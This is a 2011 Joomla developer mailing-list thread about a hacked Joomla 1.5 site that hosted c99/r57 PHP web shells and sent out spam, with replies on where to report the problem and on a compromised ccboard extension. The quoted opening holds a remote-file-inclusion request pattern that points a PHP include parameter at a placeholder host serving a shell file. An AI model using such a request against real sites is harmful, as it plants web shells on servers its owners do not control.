> For example:
>
> / Sipssys / code / box.inc.php? Config [sipssys] = http:// [target] / [path]
> / shell.x
>
> **--Rudy--**
> ethos7.com
>
> Phone: 480.382.5288
> r...@ethos7.com
>
> joomlabamboo.com <http://www.joomlabamboo.com/673.html> | joomla.org |
> ijoomla.com <http://www.iJoomla.com/1195.html> |
> xcloner.com<http://www.xcloner.com/aff/idevaffiliate.php?id=1321>|
> Site5 <http://www.site5.com/in.php?id=98465> | ethos7 <http://ethos7.com>
>
> wordpress.org |
> elegantThemes<http://www.elegantthemes.com/affiliates/idevaffiliate.php?id=7251>|
> themeForest <http://themeforest.net?ref=buckmanhands> | rocketThemes |
> studioPress
>
> Simplicity is the ultimate sophistication*
> -- **Leonardo da Vinci*
Rudy Preston
Feb 2, 2011, 3:24:06 PM2/2/11
to joomla-dev...@googlegroups.com
I got the thing quarrantined and am currently studying the code.
It is definitely a major issue though. In google searches I found this code was all over the place
It is a file uploade and downloader too and it was on the sites of some pretty major players.
here is the other script that you will find for their underground peer-to peer file sharer
MuhaciR File Upload System
google it.
Something does need to happen at a larger level than just the security team if we are going to seriously combat this.
From what I can see my infected site was sending out a massive amount of porn and viagra ads via email.
If there are even just a thousand joomla sites infected like this, then j! is letting MILLIONS of spam messages be sent.
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
It is definitely a major issue though. In google searches I found this code was all over the place
It is a file uploade and downloader too and it was on the sites of some pretty major players.
here is the other script that you will find for their underground peer-to peer file sharer
MuhaciR File Upload System
google it.
Something does need to happen at a larger level than just the security team if we are going to seriously combat this.
From what I can see my infected site was sending out a massive amount of porn and viagra ads via email.
If there are even just a thousand joomla sites infected like this, then j! is letting MILLIONS of spam messages be sent.
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
--
You received this message because you are subscribed to the Google Groups "Joomla! Framework Development" group.
To post to this group, send an email to joomla-dev...@googlegroups.com.
To unsubscribe from this group, send email to joomla-dev-frame...@googlegroups.com.
For more options, visit this group at http://groups.google.com/group/joomla-dev-framework?hl=en-GB.
elin
Feb 2, 2011, 4:30:26 PM2/2/11
to joomla-dev...@googlegroups.com
May I ask that you please not spam the lists? I did not need three copies of this message and I'm sure no one else did either. If you feel this is a development issue (I don't see it, but fine) pick the one most appropriate list. However, please note that there is a separate address for reporting security issues as well as a very active security forum and as general practice we tend not to want to reward destructive people with links to their content.
Elin
Rudy Preston
Feb 2, 2011, 4:39:10 PM2/2/11
to joomla-dev...@googlegroups.com
Sorry, I am just fully realizing that all three lists are the same people. :-)
I honestly cant tell which list is sending an email to me most of the time.
Why do we have three lists then?
and for some reason, I don't think I get even half the mails that go out.
and once again, the thing these hackers are relying on most is that we will never want to talk about it outside the security geek forum
I will be posting there as well, unless it is all the same people. Security was, sadly, not quite my top concern before this incident, and the exploit is on a J 1.5.12 install from a few years ago and not often used now.
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
I honestly cant tell which list is sending an email to me most of the time.
Why do we have three lists then?
and for some reason, I don't think I get even half the mails that go out.
and once again, the thing these hackers are relying on most is that we will never want to talk about it outside the security geek forum
I will be posting there as well, unless it is all the same people. Security was, sadly, not quite my top concern before this incident, and the exploit is on a J 1.5.12 install from a few years ago and not often used now.
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
On Wed, Feb 2, 2011 at 2:30 PM, elin <elin....@gmail.com> wrote:
May I ask that you please not spam the lists? I did not need three copies of this message and I'm sure no one else did either. If you feel this is a development issue (I don't see it, but fine) pick the one most appropriate list. However, please note that there is a separate address for reporting security issues as well as a very active security forum and as general practice we tend not to want to reward destructive people with links to their content.Elin
--
Matt Murphy
Feb 2, 2011, 6:46:38 PM2/2/11
to joomla-dev...@googlegroups.com
Thanks for the heads-up. I had something similar happen when I was using joomla 1.0. Method of upload was a disabled module a co-worker had decided not to use but had not uninstalled. Big fun.
Cheers,
MM
Cheers,
MM
Rudy Preston
Feb 2, 2011, 8:32:37 PM2/2/11
to joomla-dev...@googlegroups.com
I am not going to say who the culprit is because I do not know.
When this site was new it was a 1.5.12 install with ja_purity template
I have no idea how they got in, the only thing that uploaded photos was a photo gallery program.
What I do know is they had two hideouts:
a folder in the public root called "mtn"
a folder in the front end module folder called "com_ccboard"
I have never ever used or installed com_ccboard (ellen, is this why you are peeved?)
I do not think this was anything but subterfuge and am not pointing fingers at com_ccboard
What is in the folder is not their program.
I will say this too, the r57 and the c99 are innovative and have some amazing compact classes that stretch php to it's limits.
I mean, geez we better pay attention. They share their code on scribd and blogger. It should not be this easy.
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
When this site was new it was a 1.5.12 install with ja_purity template
I have no idea how they got in, the only thing that uploaded photos was a photo gallery program.
What I do know is they had two hideouts:
a folder in the public root called "mtn"
a folder in the front end module folder called "com_ccboard"
I have never ever used or installed com_ccboard (ellen, is this why you are peeved?)
I do not think this was anything but subterfuge and am not pointing fingers at com_ccboard
What is in the folder is not their program.
I will say this too, the r57 and the c99 are innovative and have some amazing compact classes that stretch php to it's limits.
I mean, geez we better pay attention. They share their code on scribd and blogger. It should not be this easy.
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
Troy
Feb 3, 2011, 1:36:14 AM2/3/11
to joomla-dev...@googlegroups.com
rudy, as one of the ex devs of ccboard ( unfortunately ) i can tell
u elin has zero to do with ccb... 2ndly, ccb is serverly comprimise
and you WILL get c99 hacked if u use it. This was already reported
to the JST and ccb is removed.
Bear/N6REJ
Reply all
Reply to author
Forward
0 new messages